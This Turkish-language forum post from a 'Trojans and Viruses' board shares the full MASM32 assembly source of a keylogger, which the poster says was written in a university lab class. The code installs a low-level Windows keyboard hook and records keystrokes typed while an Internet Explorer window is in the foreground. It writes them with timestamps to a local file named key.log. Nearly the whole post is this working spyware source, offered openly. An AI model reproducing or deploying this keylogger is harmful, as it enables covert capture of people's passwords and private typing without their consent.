İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

balık yemek değil balık tutmak

10-05-2012 19:41
#1
WOLSİN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2010
Nereden:
ADANA
Yaş:
27
Mesajlar:
558
Teşekkür (Etti):
145
Teşekkür (Aldı):
39
Konular:
85
Ticaret:
(0) %
işte masm32 ortamında yazılmış bir local keylogger örneği. bizzat microlab dersinde yazdık. el emeği göz nuru

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

KBDLLHOOKSTRUCT STRUCT

vkCode DWORD ?
scanCode DWORD ?
dwFlags DWORD ?
time DWORD ?
dwExtraInfo DWORD ?

KBDLLHOOKSTRUCT ENDS

keybproc PROTO DWORD, DWORD, DWORD

.data

file HANDLE 0
buffer_offset DWORD 0
caps_lock_on BOOL 0
shift BOOL 0
caps BOOL 0

.const

class_name db "kLogger", 0
log_file db "key.log", 0
logger_started db "Logger started ", 0
logger_stopped db 13, 10, "Logger stopped ", 0
format_time db "%02d.%02d.%d %02d:%02d (UTC)" ,13,10,0
error db "Error",0
ie_title db "Internet Explorer",0



.data?
buffer db 32 dup(?)
hinst HINSTANCE ?
written DWORD ?
ghwnd HWND ?




.code
start:
invoke GetModuleHandle,NULL
mov hinst,eax
call main
invoke ExitProcess,eax


main proc
LOCAL wc:WNDCLASSEX
LOCAL hook:HHOOK
LOCAL msg:MSG

invoke CreateFile, addr log_file,GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov file,eax
.IF(eax== INVALID_HANDLE_VALUE)
invoke MessageBox, NULL, addr error, addr error, MB_OK
ret
.ENDIF
invoke GetLastError
.IF (eax==ERROR_ALREADY_EXISTS)
invoke SetFilePointer,file,0,NULL,FILE_END
.ENDIF

invoke WriteFile,file,addr logger_started,15, addr written,NULL
call time2log

mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,offset main_wnd
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, WS_EX_CONTROLPARENT
push hinst
pop wc.hInstance
mov wc.hbrBackground, COLOR_BTNFACE+1
mov wc.lpszMenuName, NULL
mov wc.lpszClassName,offset class_name
mov wc.hIcon,NULL
mov wc.hIconSm,NULL
mov wc.hCursor,NULL
invoke RegisterClassEx,addr wc


.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF


invoke CreateWindowEx, NULL, addr class_name, NULL, 0, 0, 0, 0, 0, NULL, NULL, hinst, NULL

.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF



mov ghwnd, eax
invoke GetKeyState, VK_CAPITAL

.IF(eax)

mov caps, 1
.ENDIF


invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr keybproc, hinst, NULL
mov hook, eax


.WHILE TRUE
invoke GetMessage, addr msg, NULL, 0,0
.BREAK .IF(!eax)
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg

.ENDW



invoke UnhookWindowsHookEx, hook
call flush_buffer
invoke WriteFile, file, addr logger_stopped, 17, addr written, NULL
call time2log

invoke CloseHandle, file


mov eax,msg.wParam
ret


main endp




main_wnd proc hwnd:HWND, msg:UINT, wparam:WPARAM, lparam:LPARAM

.IF(msg==WM_CLOSE)
invoke PostQuitMessage, NULL
.ELSE

invoke DefWindowProc, hwnd, msg, wparam, lparam
ret
.ENDIF


xor eax,eax
ret
main_wnd endp



ie_active proc

local hwnd: HWND
local text[256]: BYTE
local i: UINT
local j: UINT


call GetForegroundWindow
mov hwnd, eax

invoke GetWindowText, hwnd, addr text, SIZEOF text
mov i, eax
mov j,0

.WHILE(i)

mov ebx, j
invoke lstrcmpi, addr text[ebx], addr ie_title
.IF(!eax)

mov eax, 1
ret
.ENDIF
dec i
inc j
.ENDW


xor eax, eax
ret

ie_active endp









keybproc proc code DWORD, wparam:WPARAM, lparam: LPARAM

call ie_active
.IF (eax && (code == HC_ACTION))
mov ebx, lparam
assume ebxtr KBDLLHOOKSTRUCT
mov edx, [ebx].vkCode
.IF (wparam ==WM_KEYDOWN)
; if user hits f10 , we shut down
.IF (edx == VK_F10)
invoke PostMessage, ghwnd, WM_CLOSE, NULL, NULL
ret
.ENDIF

; keep track of shift and capslock

.IF (edx == VK_LSHIFT || edx ==VK_RSHIFT)
mov shift, 1
.ELSEIF (edx == VK_CAPITAL)
.IF (!caps_lock_on)
; toggle caps true/ false
xor caps, 1
mov caps_lock_on, 1
.ENDIF
.ELSE
;write to file if buffer might overflow
.IF (buffer_offset >=32-16)
call flush_buffer
.ENDIF

mov ecx, buffer_offset

.IF (edx == VK_SPACE|| edx == VK_RETURN || edx == VK_TAB)
mov buffer[ecx], dl
inc ecx
.ELSEIF (!shift && (edx>2Fh && edx < 3Ah))
; 0..9
mov buffer[ecx], dl
inc ecx
.ELSEIF (edx > 40h && edx < 5Bh)
mov eax, shift
xor eax , caps
.IF (!eax)
or edx, 20h
.ENDIF

mov buffer[ecx], dl
inc ecx
.ELSE

mov buffer[ecx], '['
inc ecx
.IF (shift)
mov buffer[ecx], '!'
inc ecx
.ENDIF

push ecx
mov eax , 32-1
sub eax, ecx
push eax
lea eax, buffer[ecx]
push eax
mov edx, [ebx].scanCode
mov eax, [ebx].dwFlags
shl edx , 16
shl eax , 24
or edx, eax
push edx
call GetKeyNameText
pop ecx
add ecx, eax
mov buffer[ecx], ']'
inc ecx
.ENDIF
mov buffer_offset, ecx
.ENDIF
.ELSEIF (wparam== WM_KEYUP)
.IF (edx == VK_LSHIFT || edx == VK_RSHIFT)
mov shift, 0
.ELSE
mov caps_lock_on, 0
.ENDIF
.ENDIF

assume ebx: nothing
.ENDIF

invoke CallNextHookEx , NULL, code, wparam, lparam

ret
keybproc endp
time2log proc
LOCAL SysTime:SYSTEMTIME
LOCAL output[32]:BYTE

;Get current date/time
invoke GetSystemTime,addr SysTime
lea ebx,SysTime
assume ebxtr SYSTEMTIME
xor eax,eax
mov ax,[ebx].wSecond
push eax
mov ax,[ebx].wMinute
push eax
mov ax,[ebx].wHour
push eax
mov ax,[ebx].wYear
push eax
mov ax,[ebx].wMonth
push eax
mov ax,[ebx].wDay
push eax
assume ebx:nothing
push offset format_time
lea eax,output
push eax
call wsprintf

;Write it to the log file
invoke WriteFile, file,addr output, eax, addr written, NULL
ret

time2log endp

flush_buffer proc
;Write buffered data to log file
.IF (buffer_offset!=0)
invoke WriteFile,file,addr buffer, buffer_offset,addr written,NULL

mov buffer_offset,0
.ENDIF
ret
flush_buffer endp
end start
Kullanıcı İmzası
Raspberry Pi, Arduino, UAV, Autopilot, Flight Controller, C, C++, C#, Windows Phone 8 ,Asp.net, Aforge.net framework ,Openlayers, Entity Framework, eBA süreç yönetimi, Oracle, Mssql, ödevler, projeler...
Konu WOLSİN tarafından (10-05-2012 19:48 Saat 19:48 ) değiştirilmiştir.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı